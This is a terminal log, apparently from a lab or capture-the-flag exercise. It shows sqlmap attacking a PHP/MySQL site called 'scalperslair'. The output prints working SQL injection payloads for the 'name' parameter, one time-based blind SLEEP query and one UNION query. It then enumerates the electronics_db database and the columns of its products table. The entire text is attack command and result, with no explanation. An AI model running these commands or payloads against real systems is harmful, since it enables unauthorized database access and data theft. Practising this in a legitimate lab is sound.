└─$ sqlmap -u http://scalperslair/index.php?name=6090 --tables —columns --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:57:55 /2025-03-03/

[14:57:55] [INFO] resuming back-end DBMS 'mysql' 
[14:57:55] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=bjmclr6kgi0...9mops8t5h1'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=R' AND (SELECT 8519 FROM (SELECT(SLEEP(5)))uafv) AND 'gxSs'='gxSs

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: name=R' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a626a71,0x4d6d5a4c63464b5978754f4c46664c455061544f50694f4e5579636768506779664958426777637a,0x716b717a71)-- -
---
[14:57:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.24, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:57:55] [INFO] fetching database names
[14:57:55] [INFO] fetching tables for databases: 'electronics_db'

Database: electronics_db
[1 table]
+---------------------------------------+
| products                              |
+---------------------------------------+

[14:57:55] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[14:57:55] [INFO] fetching current database
[14:57:55] [INFO] fetching columns for table 'products' in database 'electronics_db'
Database: electronics_db
Table: products
[4 columns]
+-------------+---------------+
| Column      | Type          |
+-------------+---------------+
| description | text          |
| name        | varchar(100)  |
| id          | int(11)       |
| price       | decimal(10,2) |
+-------------+---------------+

[14:57:55] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/scalperslair'

[*] ending @ 14:57:55 /2025-03-03/